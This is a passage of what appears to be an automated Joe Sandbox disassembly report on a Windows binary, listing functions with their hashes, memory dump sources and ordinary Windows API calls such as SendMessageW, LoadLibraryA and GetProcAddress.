                                                                    • Instruction ID: ec12208ffd93071b41f5ed4454ea3f65c4678d85ce0ea703bd0fe334c7418808
                                                                    • Opcode Fuzzy Hash: c53e14122089d48160764d7f1b65f6c35f66537f6c7775d9352b365033e950b5
                                                                    • Instruction Fuzzy Hash: 73219F32510218BBEF119FA4CC86FEA3B7AEF48714F110215FE556B1D0D6B5AC55CB90
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0068A941
                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0068A94F
                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0068A956
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$DestroyWindow
                                                                    • String ID: msctls_updown32
                                                                    • API String ID: 4014797782-2298589950
                                                                    • Opcode ID: 1edc8731e4f8f5b6518d86294282655c3922042edb086f8541d9681c9ee7a3b6
                                                                    • Instruction ID: acb0408a4c414d8bae3b95e926cba938f773603173bdbecf2de044f1344d913c
                                                                    • Opcode Fuzzy Hash: 1edc8731e4f8f5b6518d86294282655c3922042edb086f8541d9681c9ee7a3b6
                                                                    • Instruction Fuzzy Hash: DD2192B5610209AFEB10EF58DCD1DA737AEEB5A354B05015AFA059B351CB30EC11DB61
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00689A30
                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00689A40
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00689A65
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$MoveWindow
                                                                    • String ID: Listbox
                                                                    • API String ID: 3315199576-2633736733
                                                                    • Opcode ID: c63e0555ba5749380d2a116b90ab7bd9218e408ec001dc930d6ac04c7d21d208
                                                                    • Instruction ID: e19c4138c7835f96df4b3ef98ea62a758219fcac58ec0025a9b5c9262a1ddef0
                                                                    • Opcode Fuzzy Hash: c63e0555ba5749380d2a116b90ab7bd9218e408ec001dc930d6ac04c7d21d208
                                                                    • Instruction Fuzzy Hash: FC21C532610118BFDF259F54CC85EFF3BABEF8A750F058229F9455B290CA719C118BA0
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0068A46D
                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0068A482
                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0068A48F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: msctls_trackbar32
                                                                    • API String ID: 3850602802-1010561917
                                                                    • Opcode ID: 3a5263244e8f592bc3861b3bca640168bfc7b18b27febab4c178d350f25d175d
                                                                    • Instruction ID: 98911b3791ba69dd0bf1b022cf3b8ed122cb676add3a977600fde854b2352243
                                                                    • Opcode Fuzzy Hash: 3a5263244e8f592bc3861b3bca640168bfc7b18b27febab4c178d350f25d175d
                                                                    • Instruction Fuzzy Hash: D311CA71240208BEEF246F75CC49FEB37AAEF89754F014229FA45A6191D6B2E811DB24
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00642350,?), ref: 006422A1
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 006422A8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: RoInitialize$combase.dll
                                                                    • API String ID: 2574300362-340411864
                                                                    • Opcode ID: aa1bbbf017a40eeb28f2b4186bfcde306606700ca5ae8c3187c85dc850a24f7c
                                                                    • Instruction ID: 99031faf73e89b9b51787976aea6de9395a029d305a07bbb658250e0031d0fd2
                                                                    • Opcode Fuzzy Hash: aa1bbbf017a40eeb28f2b4186bfcde306606700ca5ae8c3187c85dc850a24f7c
                                                                    • Instruction Fuzzy Hash: 07E09270A543419BEB506FB1DC8DB993657A705705F516024F202DD5A0DBF95584CF18
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00642276), ref: 00642376
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0064237D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: RoUninitialize$combase.dll
                                                                    • API String ID: 2574300362-2819208100
                                                                    • Opcode ID: a4fc3bdf2787d8b63bcbaa88b0147c43a4f76b28bb9616d5116e7f90ca60c92d
                                                                    • Instruction ID: a4822092a7124dccecb588718d79ac3833cdc37d1274b16306138106911fb884
                                                                    • Opcode Fuzzy Hash: a4fc3bdf2787d8b63bcbaa88b0147c43a4f76b28bb9616d5116e7f90ca60c92d
                                                                    • Instruction Fuzzy Hash: 68E0B670649341ABEB216FE1ED4DB843B67B70570AF112414F20ADA5B0CBF86891CF14
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: LocalTime__swprintf
                                                                    • String ID: %.3d$WIN_XPe
                                                                    • API String ID: 2070861257-2409531811
                                                                    • Opcode ID: f1298be93cea39ad663e9b5312dff5aa420643346f385217f1bbe31ab1a4c4ec
                                                                    • Instruction ID: c6ecc8059ea2a97261c44e90f467277117df8713045ac4be90660ff6f96e1c34
                                                                    • Opcode Fuzzy Hash: f1298be93cea39ad663e9b5312dff5aa420643346f385217f1bbe31ab1a4c4ec
                                                                    • Instruction Fuzzy Hash: DAE012B1C04618DBCF5097D0DD09EF973FFA704741F100493B906A5900D6359B86EA56
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,006821FB,?,006823EF), ref: 00682213
                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00682225
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: GetProcessId$kernel32.dll
                                                                    • API String ID: 2574300362-399901964
                                                                    • Opcode ID: 847b9232a6b44576cc6e38f12b00ed460579d34deee15ab51021648fa9c3c5a4
                                                                    • Instruction ID: 95f3558cf9ddac685a8d17730b3d1941b3e42cd5d6b0d643a2fa3a52faff263d
                                                                    • Opcode Fuzzy Hash: 847b9232a6b44576cc6e38f12b00ed460579d34deee15ab51021648fa9c3c5a4
                                                                    • Instruction Fuzzy Hash: F1D0A7B48107139FC7216F70F828641B7D7EF0A300B01551AE846E2750DB70EC808B50
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,006242EC,?,006242AA,?), ref: 00624304
                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00624316
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                    • API String ID: 2574300362-1355242751
                                                                    • Opcode ID: 790edc342499075807790fa44d64fd4a52cb9cee205711273292228d9ced734d
                                                                    • Instruction ID: f381d9880d02ec616fa6e2418a9871bf64ca72b3a1886377faf0787910a6a81d
                                                                    • Opcode Fuzzy Hash: 790edc342499075807790fa44d64fd4a52cb9cee205711273292228d9ced734d
                                                                    • Instruction Fuzzy Hash: 03D0A770800B239FC7309F61F80C64577D6AF15301B01441AE447D2760EBB0DC808E10
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,006241BB,00624341,?,0062422F,?,006241BB,?,?,?,?,006239FE,?,00000001), ref: 00624359
                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0062436B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                    • API String ID: 2574300362-3689287502
                                                                    • Opcode ID: e2f3d6624d541852ad71bd7434a64c18d43b51c195e24ed23de6a6a08679483f
                                                                    • Instruction ID: 7c2b3bcc4622f19d3b7b6a991eb58fb00ff0a7bd1c5c59d5b25ce03d63b66222
                                                                    • Opcode Fuzzy Hash: e2f3d6624d541852ad71bd7434a64c18d43b51c195e24ed23de6a6a08679483f
                                                                    • Instruction Fuzzy Hash: 18D0A770C04B23DFC7209F71F80864177D6AF25725B01451AE492D2750EBB0EC808E10
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0066052F,?,006606D7), ref: 00660572
                                                                    • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00660584
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                    • API String ID: 2574300362-1587604923
                                                                    • Opcode ID: 0f2bbf2490ba27762006ddae78714d00294ea5c4c02e4ac8bbe55fcc247b6776
                                                                    • Instruction ID: 99d3d62cf5ed153e9a11b4f809ba25162ae06eb6865608e22ace0994a2ed1916
                                                                    • Opcode Fuzzy Hash: 0f2bbf2490ba27762006ddae78714d00294ea5c4c02e4ac8bbe55fcc247b6776
                                                                    • Instruction Fuzzy Hash: 7CD0A730850323AFD7206F70E808B4377E7AB15300B11882FE843D2750D770D8C08E20
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(oleaut32.dll,?,0066051D,?,006605FE), ref: 00660547
                                                                    • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00660559
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                    • API String ID: 2574300362-1071820185
                                                                    • Opcode ID: eabc49dd6d1a5e8b42830f5b59a8316bcb2e304ff0dd2deb1e9d39a37ff2463a
                                                                    • Instruction ID: ebd959044b1736e80e248e56dcb631f819bc8460f2adb3a453a08f28a6f3155d
                                                                    • Opcode Fuzzy Hash: eabc49dd6d1a5e8b42830f5b59a8316bcb2e304ff0dd2deb1e9d39a37ff2463a
                                                                    • Instruction Fuzzy Hash: 61D0A7308507139FD7209F61E80864676E6AB11301B11C82EE447D2760D670DC808E10
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0067ECBE,?,0067EBBB), ref: 0067ECD6
                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0067ECE8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                    • API String ID: 2574300362-1816364905
                                                                    • Opcode ID: 151858f361ca49ec40f78c816e4e4179d5c6aab4e08e824dab7ce67640a422c4
                                                                    • Instruction ID: 4c4d6bdd27c2a6b74d141cad5eda129b2096ca2114764967195909291377d409
                                                                    • Opcode Fuzzy Hash: 151858f361ca49ec40f78c816e4e4179d5c6aab4e08e824dab7ce67640a422c4
                                                                    • Instruction Fuzzy Hash: 02D0A7758007239FCB216F60E94864277E6AF05300B01C45EF85AD2750DF74DC848E10
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0067BAD3,00000001,0067B6EE,?,006BDC00), ref: 0067BAEB
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0067BAFD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                    • API String ID: 2574300362-199464113
                                                                    • Opcode ID: af8799ed2411e5abdce927b081cd8ad1994949f329b59ff7c240ca3fcb0fb161
                                                                    • Instruction ID: d076fe9df96e078dd7cd78ca4a615ca1a57ca2960cc7ab3fca967bef02033c8b
                                                                    • Opcode Fuzzy Hash: af8799ed2411e5abdce927b081cd8ad1994949f329b59ff7c240ca3fcb0fb161
                                                                    • Instruction Fuzzy Hash: 2BD05E70D107139FC7306F60A848B5176D6AB05700B01941AE847D2750DB70DC80CA10
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00683BD1,?,00683E06), ref: 00683BE9
                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00683BFB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                    • API String ID: 2574300362-4033151799
                                                                    • Opcode ID: f54134c22d092d1bbb35d8d6cd66a1e5c6ff4ca30d459a8ca11a7facfd6e6cdc
                                                                    • Instruction ID: 4a457a17143d0043e9102dc273708ddf362d051c47b369a25467fe71d059a60d
                                                                    • Opcode Fuzzy Hash: f54134c22d092d1bbb35d8d6cd66a1e5c6ff4ca30d459a8ca11a7facfd6e6cdc
                                                                    • Instruction Fuzzy Hash: 0BD0A7B08007629FC7207FA0E808643BAF6AF02714B11441AE447E2750DBB0DC808F10
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ab7a7f3619fc562244c3513288c650a23df65c21cf4a9c02c07071cb0c8bb3c1
                                                                    • Instruction ID: 857cf23406a753c39f6f18bbe75ba2ee827738c6075b3420faff2ab093d9d80b
                                                                    • Opcode Fuzzy Hash: ab7a7f3619fc562244c3513288c650a23df65c21cf4a9c02c07071cb0c8bb3c1
                                                                    • Instruction Fuzzy Hash: 3DC16C75A0021AEFCB14DF94C885AAEB7B6FF48701F104598ED06EB251D730EE45DBA0
                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 0067AAB4
                                                                    • CoUninitialize.OLE32 ref: 0067AABF
                                                                      • Part of subcall function 00660213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0066027B
                                                                    • VariantInit.OLEAUT32(?), ref: 0067AACA
                                                                    • VariantClear.OLEAUT32(?), ref: 0067AD9D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                    • String ID:
                                                                    • API String ID: 780911581-0
                                                                    • Opcode ID: 4150aef959216b4696c53841088b83775c0a5b440a5c0af21dec9fe57c768d7d
                                                                    • Instruction ID: f4e3bb2eb5cbf26be937a315e2c23aaea9959376648443df731c779f979751d7
                                                                    • Opcode Fuzzy Hash: 4150aef959216b4696c53841088b83775c0a5b440a5c0af21dec9fe57c768d7d
                                                                    • Instruction Fuzzy Hash: 7AA14575204B119FCB51EF54C491A5EB7E6BF88710F14844DFA9A9B3A2CB30ED01CB9A
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$AllocClearCopyInitString
                                                                    • String ID:
                                                                    • API String ID: 2808897238-0
                                                                    • Opcode ID: 465fed04cf8d1039710ab3d3614f9ab4297c2a47a29e241039957477283a32df
                                                                    • Instruction ID: 8c86675e60938573f670f334c7588406577a56b29b81e207c5110ddabec90cd3
                                                                    • Opcode Fuzzy Hash: 465fed04cf8d1039710ab3d3614f9ab4297c2a47a29e241039957477283a32df
                                                                    • Instruction Fuzzy Hash: CE51F830604306DBDB60AF65D491A6EB3E7EF49315F20982FE946CB2D1DB349849CB25
                                                                    APIs
                                                                    • GetWindowRect.USER32(01287F88,?), ref: 0068C544
                                                                    • ScreenToClient.USER32(?,00000002), ref: 0068C574
